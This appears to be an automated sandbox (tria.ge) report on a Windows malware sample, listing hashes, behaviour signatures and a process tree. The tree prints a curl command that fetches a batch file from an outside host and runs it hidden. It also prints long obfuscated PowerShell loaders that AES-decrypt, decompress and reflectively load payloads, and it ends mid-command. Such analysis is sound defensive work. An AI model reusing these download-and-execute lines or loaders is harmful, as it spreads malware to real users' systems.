Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
111s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
04/07/2023, 13:33
Static task
static1
Behavioral task
behavioral1
Sample
a299e230a172c79e5d30de052.exe
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
a299e230a172c79e5d30de052.exe
Resource
win10v2004-20230621-en
General
-
Target
a299e230a172c79e5d30de052.exe
-
Size
3KB
-
MD5
a299e230a172c79e5d30de052cefaddc
-
SHA1
9ac47e62085f05a4ce58bd999332ab04fee40e30
-
SHA256
177b40f96a09a3919b2c8846ca73abb09855d078ff9dee89610bc2b75d44cb31
-
SHA512
0ca74bb6c51bc374be01402aa8e4a284c1730c49ba6ba1425871c754e1dfd8a7b7bfe92dd6e854941f299e724488ef5474f92253001503a8f38531b395e6b509
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4692 created 624 4692 v8pb4a2bgu.bat.exe 3 PID 1400 created 624 1400 $sxr-powershell.exe 3 PID 1400 created 624 1400 $sxr-powershell.exe 3 PID 4692 created 624 4692 v8pb4a2bgu.bat.exe 3 PID 4692 created 624 4692 v8pb4a2bgu.bat.exe 3 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation a299e230a172c79e5d30de052.exe -
Executes dropped EXE 3 IoCs
pid Process 4692 v8pb4a2bgu.bat.exe 1400 $sxr-powershell.exe 320 $sxr-powershell.exe -
Drops file in System32 directory 11 IoCs
description ioc Process File created C:\Windows\System32\vcruntime140_1d.dll v8pb4a2bgu.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll v8pb4a2bgu.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll v8pb4a2bgu.bat.exe File opened for modification C:\Windows\System32\vcruntime140d.dll v8pb4a2bgu.bat.exe File opened for modification C:\Windows\System32\vcruntime140_1d.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\System32\ucrtbased.dll v8pb4a2bgu.bat.exe File created C:\Windows\System32\vcruntime140d.dll v8pb4a2bgu.bat.exe File opened for modification C:\Windows\System32\ucrtbased.dll $sxr-powershell.exe File opened for modification C:\Windows\System32\vcruntime140d.dll $sxr-powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4692 set thread context of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 1400 set thread context of 4592 1400 $sxr-powershell.exe 105 PID 1400 set thread context of 2576 1400 $sxr-powershell.exe 110 PID 4692 set thread context of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 set thread context of 4484 4692 v8pb4a2bgu.bat.exe 113 -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File opened for modification C:\Windows\$sxr-seroxen2\$sxr-Uni.bat cmd.exe File created C:\Windows\$sxr-powershell.exe v8pb4a2bgu.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe v8pb4a2bgu.bat.exe File created C:\Windows\$sxr-mshta.exe v8pb4a2bgu.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe v8pb4a2bgu.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2264 3520 WerFault.exe 49 1356 3428 WerFault.exe 43 -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2312 PING.EXE -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 4208 powershell.exe 4208 powershell.exe 4692 v8pb4a2bgu.bat.exe 4692 v8pb4a2bgu.bat.exe 4692 v8pb4a2bgu.bat.exe 2056 dllhost.exe 2056 dllhost.exe 2056 dllhost.exe 2056 dllhost.exe 4692 v8pb4a2bgu.bat.exe 4692 v8pb4a2bgu.bat.exe 1400 $sxr-powershell.exe 1400 $sxr-powershell.exe 1400 $sxr-powershell.exe 1400 $sxr-powershell.exe 4592 dllhost.exe 4592 dllhost.exe 4592 dllhost.exe 4592 dllhost.exe 1400 $sxr-powershell.exe 1400 $sxr-powershell.exe 320 $sxr-powershell.exe 320 $sxr-powershell.exe 320 $sxr-powershell.exe 320 $sxr-powershell.exe 1400 $sxr-powershell.exe 2576 dllhost.exe 2576 dllhost.exe 2576 dllhost.exe 2576 dllhost.exe 4692 v8pb4a2bgu.bat.exe 1736 dllhost.exe 1736 dllhost.exe 4692 v8pb4a2bgu.bat.exe 4692 v8pb4a2bgu.bat.exe 4484 dllhost.exe 4484 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 4208 powershell.exe Token: SeDebugPrivilege 4692 v8pb4a2bgu.bat.exe Token: SeDebugPrivilege 4692 v8pb4a2bgu.bat.exe Token: SeDebugPrivilege 2056 dllhost.exe Token: SeDebugPrivilege 1400 $sxr-powershell.exe Token: SeDebugPrivilege 1400 $sxr-powershell.exe Token: SeDebugPrivilege 4592 dllhost.exe Token: SeDebugPrivilege 320 $sxr-powershell.exe Token: SeDebugPrivilege 1400 $sxr-powershell.exe Token: SeDebugPrivilege 2576 dllhost.exe Token: SeDebugPrivilege 4692 v8pb4a2bgu.bat.exe Token: SeDebugPrivilege 1736 dllhost.exe Token: SeDebugPrivilege 4692 v8pb4a2bgu.bat.exe Token: SeDebugPrivilege 4484 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1400 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1564 wrote to memory of 2000 1564 a299e230a172c79e5d30de052.exe 84 PID 1564 wrote to memory of 2000 1564 a299e230a172c79e5d30de052.exe 84 PID 2000 wrote to memory of 4528 2000 cmd.exe 86 PID 2000 wrote to memory of 4528 2000 cmd.exe 86 PID 2000 wrote to memory of 4208 2000 cmd.exe 87 PID 2000 wrote to memory of 4208 2000 cmd.exe 87 PID 4208 wrote to memory of 2564 4208 powershell.exe 88 PID 4208 wrote to memory of 2564 4208 powershell.exe 88 PID 2564 wrote to memory of 4484 2564 cmd.exe 90 PID 2564 wrote to memory of 4484 2564 cmd.exe 90 PID 4484 wrote to memory of 1204 4484 net.exe 91 PID 4484 wrote to memory of 1204 4484 net.exe 91 PID 2564 wrote to memory of 4692 2564 cmd.exe 100 PID 2564 wrote to memory of 4692 2564 cmd.exe 100 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 2056 4692 v8pb4a2bgu.bat.exe 101 PID 4692 wrote to memory of 1400 4692 v8pb4a2bgu.bat.exe 103 PID 4692 wrote to memory of 1400 4692 v8pb4a2bgu.bat.exe 103 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 4592 1400 $sxr-powershell.exe 105 PID 1400 wrote to memory of 320 1400 $sxr-powershell.exe 109 PID 1400 wrote to memory of 320 1400 $sxr-powershell.exe 109 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 1400 wrote to memory of 2576 1400 $sxr-powershell.exe 110 PID 2576 wrote to memory of 624 2576 dllhost.exe 3 PID 2576 wrote to memory of 680 2576 dllhost.exe 1 PID 2576 wrote to memory of 956 2576 dllhost.exe 11 PID 2576 wrote to memory of 64 2576 dllhost.exe 10 PID 2576 wrote to memory of 540 2576 dllhost.exe 81 PID 2576 wrote to memory of 868 2576 dllhost.exe 13 PID 2576 wrote to memory of 1044 2576 dllhost.exe 80 PID 2576 wrote to memory of 1056 2576 dllhost.exe 79 PID 2576 wrote to memory of 1164 2576 dllhost.exe 14 PID 680 wrote to memory of 2476 680 lsass.exe 56 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 4692 wrote to memory of 1736 4692 v8pb4a2bgu.bat.exe 111 PID 680 wrote to memory of 1328 680 lsass.exe 36 PID 2576 wrote to memory of 1196 2576 dllhost.exe 15 PID 680 wrote to memory of 2108 680 lsass.exe 62 PID 680 wrote to memory of 2476 680 lsass.exe 56 PID 2576 wrote to memory of 1228 2576 dllhost.exe 78 PID 2576 wrote to memory of 1248 2576 dllhost.exe 77 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:64
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8fdfc3b4-ea01-471e-ab84-1afa779472c0}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{05e339f2-166c-4306-b761-b70b5c4d14f4}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{94348405-004c-4e56-ab1e-a8467bd37d55}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2576
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fd49f7ea-fec1-4230-83ca-ce0431557b3c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6dde4b0f-9565-488d-9e90-c19025090164}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1196
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2528
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:1328
-
C:\Users\Admin\AppData\Local\Temp\a299e230a172c79e5d30de052.exe"C:\Users\Admin\AppData\Local\Temp\a299e230a172c79e5d30de052.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -o %temp%\v8pb4a2bgu.bat https://upload.nugeta.net/uploads/Uni.bat & powershell start -WindowStyle hidden %temp%\v8pb4a2bgu.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\curl.execurl -o C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat https://upload.nugeta.net/uploads/Uni.bat3⤵PID:4528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start -WindowStyle hidden C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat" "4⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\net.exenet session5⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session6⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat.exe"v8pb4a2bgu.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function fWQSl($smkIZ){ $wduXp=[System.Security.Cryptography.Aes]::Create(); $wduXp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $wduXp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $wduXp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wJHzsp6SPXfRfRJEp2DnWNjCp7yRoOX80D+K6Y8SDbg='); $wduXp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSnlfa5uZvt5/hSiWG2fmg=='); $qohan=$wduXp.CreateDecryptor(); $return_var=$qohan.TransformFinalBlock($smkIZ, 0, $smkIZ.Length); $qohan.Dispose(); $wduXp.Dispose(); $return_var;}function JrJro($smkIZ){ $sZImH=New-Object System.IO.MemoryStream(,$smkIZ); $xADsr=New-Object System.IO.MemoryStream; $zNLKG=New-Object System.IO.Compression.GZipStream($sZImH, [IO.Compression.CompressionMode]::Decompress); $zNLKG.CopyTo($xADsr); $zNLKG.Dispose(); $sZImH.Dispose(); $xADsr.Dispose(); $xADsr.ToArray();}function dfJQI($smkIZ,$LzKCP){ $bmjxj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$smkIZ); $EFqhw=$bmjxj.EntryPoint; $EFqhw.Invoke($null, $LzKCP);}$vHiXq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat').Split([Environment]::NewLine);foreach ($KVOmw in $vHiXq) { if ($KVOmw.StartsWith(':: ')) { $ZGLQh=$KVOmw.Substring(4); break; }}$MJAQp=[string[]]$ZGLQh.Split('\');$lpVtG=JrJro (fWQSl ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($MJAQp[0])));$acjVV=JrJro (fWQSl ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($MJAQp[1])));dfJQI $acjVV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dfJQI $lpVtG (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function qMEAm($SBLhF){ $OmgWn=[System.Security.Cryptography.Aes]::Create(); $OmgWn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OmgWn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OmgWn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30='); $OmgWn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA=='); $bzdRW=$OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')(); $oeVNg=$bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SBLhF, 0, $SBLhF.Length); $bzdRW.Dispose(); $OmgWn.Dispose(); $oeVNg;}function FpgXf($SBLhF){ $ACvdD=New-Object System.IO.MemoryStream(,$SBLhF); $fxSDY=New-Object System.IO.MemoryStream; $sioSc=New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::Decompress); $sioSc.CopyTo($fxSDY); $sioSc.Dispose(); $ACvdD.Dispose(); $fxSDY.Dispose(); $fxSDY.ToArray();}function qYOzs($SBLhF,$kaOgp){ $uGEfN=[System.Reflection.Assembly]::Load([byte[]]$SBLhF); $lPQfD=$uGEfN.EntryPoint; $lPQfD.Invoke($null, $kaOgp);}$OmgWn1 = New-Object System.Security.Cryptography.AesManaged;$OmgWn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bDukH = $OmgWn1.('rotpyrceDetaerC'[-1..-15] -join '')();$KjvsN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vIu/qtGS/x2SF+sMWSvDow==');$KjvsN = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN, 0, $KjvsN.Length);$KjvsN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN);$plOkO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NRF7C23+0Byt9JP09Qn3+DY9RWuWXg3qOZ5asN5y0ws=');$plOkO = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($plOkO, 0, $plOkO.Length);$plOkO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($plOkO);$BdVPD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YazMmludb1vvXcZAwlnHtw==');$BdVPD = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdVPD, 0, $BdVPD.Length);$BdVPD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdVPD);$Khvbp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zf4gu7ZD/I0b6kn1xVw/lUgWPK+5TZfCSPo5/VhvOXuI85jnbHRoOd2fBY8oxjU26aXQHO2B52J1YA7TfWY3FWExstcJfnODtZBebrQGClVdHebcL2OSattonC3hU321X5S9joWtE4fv8lvmwXH8ZSMbOMFWFESDoOJt+1Bt/H4EOblhpHmooz9fO/Z0BQMWnBbu2ar5V+hEHCESz43Kaxu4hmpzzDEJu+AmLCnK5LBUY45S1drr3J7exCZSxUHJyRziq1L3pwqUI84KLwjoW/k6C5j/KY3rneb2ZEWz9plzz8jRvwboouGn1UIfaUeaBMH1+0BvjxLP3r34OlMXRA5fmStXzraQt7JAdtXUP8wXRdqcOKUQtp52SelQ6J0WjdGAtsvRvQubLio0A+mNT6WMINjpxOSFgujINR8XOic=');$Khvbp = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Khvbp, 0, $Khvbp.Length);$Khvbp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Khvbp);$OawVc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtBl8RDMM8q8D+f38cUwlQ==');$OawVc = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OawVc, 0, $OawVc.Length);$OawVc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OawVc);$FBZIn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vWt5Q/a84rfnuBa3yHiejA==');$FBZIn = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FBZIn, 0, $FBZIn.Length);$FBZIn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FBZIn);$AkiHH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UavpIk4tpnHdD1kgrI4R2w==');$AkiHH = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AkiHH, 0, $AkiHH.Length);$AkiHH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AkiHH);$fIDaQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFB5V6XdocehcH6idKuJ0w==');$fIDaQ = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fIDaQ, 0, $fIDaQ.Length);$fIDaQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fIDaQ);$HMBte = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzQvJLBl0kmxaMejxpYmTA==');$HMBte = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HMBte, 0, $HMBte.Length);$HMBte = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HMBte);$KjvsN0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8D3dfobAIMj6AYpSV1togQ==');$KjvsN0 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN0, 0, $KjvsN0.Length);$KjvsN0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN0);$KjvsN1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1bVhrF128/BjmNUc1iFP/g==');$KjvsN1 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN1, 0, $KjvsN1.Length);$KjvsN1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN1);$KjvsN2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NKOjM2E+a4FkOdDaJJVE3w==');$KjvsN2 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN2, 0, $KjvsN2.Length);$KjvsN2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN2);$KjvsN3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oWIK372gtRppDGwBPsAgnQ==');$KjvsN3 = $bDukH.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KjvsN3, 0, $KjvsN3.Length);$KjvsN3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KjvsN3);$bDukH.Dispose();$OmgWn1.Dispose();if (@(get-process -ea silentlycontinue $KjvsN3).count -gt 1) {exit};$FrMqe = [Microsoft.Win32.Registry]::$fIDaQ.$AkiHH($KjvsN).$FBZIn($plOkO);$zSvhR=[string[]]$FrMqe.Split('\');$Odjii=FpgXf(qMEAm([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[1])));qYOzs $Odjii (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$SQOFS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($zSvhR[0]);$OmgWn = New-Object System.Security.Cryptography.AesManaged;$OmgWn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bzdRW = $OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')();$SQOFS = $bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SQOFS, 0, $SQOFS.Length);$bzdRW.Dispose();$OmgWn.Dispose();$ACvdD = New-Object System.IO.MemoryStream(, $SQOFS);$fxSDY = New-Object System.IO.MemoryStream;$sioSc = New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::$KjvsN1);$sioSc.$HMBte($fxSDY);$sioSc.Dispose();$ACvdD.Dispose();$fxSDY.Dispose();$SQOFS = $fxSDY.ToArray();$gZCIb = $Khvbp | IEX;$uGEfN = $gZCIb::$KjvsN2($SQOFS);$lPQfD = $uGEfN.EntryPoint;$lPQfD.$KjvsN0($null, (, [string[]] ($BdVPD)))6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function qMEAm($SBLhF){ $OmgWn=[System.Security.Cryptography.Aes]::Create(); $OmgWn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OmgWn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OmgWn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30='); $OmgWn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA=='); $bzdRW=$OmgWn.('rotpyrceDetaerC'[-1..-15] -join '')(); $oeVNg=$bzdRW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SBLhF, 0, $SBLhF.Length); $bzdRW.Dispose(); $OmgWn.Dispose(); $oeVNg;}function FpgXf($SBLhF){ $ACvdD=New-Object System.IO.MemoryStream(,$SBLhF); $fxSDY=New-Object System.IO.MemoryStream; $sioSc=New-Object System.IO.Compression.GZipStream($ACvdD, [IO.Compression.CompressionMode]::Decompress); $sioSc.CopyTo($fxSDY); $sioSc.Dispose(); $ACvdD.Dispose(); $fxSDY.Dispose(); $fxSDY.ToArray();}function qYOzs($SBLhF,$kaOgp){ $uGEfN=[System.Reflection.Assembly]::Load([byte[]]$SBLhF); $lPQfD=$uGEfN.EntryPoint; $lPQfD.Invoke($null, $kaOgp);}$OmgWn1 = New-Object System.Security.Cryptography.AesManaged;$OmgWn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OmgWn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OmgWn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lPeISJ/g7kLbufLxcQYWsU04fcGHjefe80ihx9xLZ30=');$OmgWn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qijW8aThyI9qYQLHX3RmOA==');$bDukH = $OmgWn1.('rotpyrceDetaerC'[-1..-15] -join '')();$KjvsN = 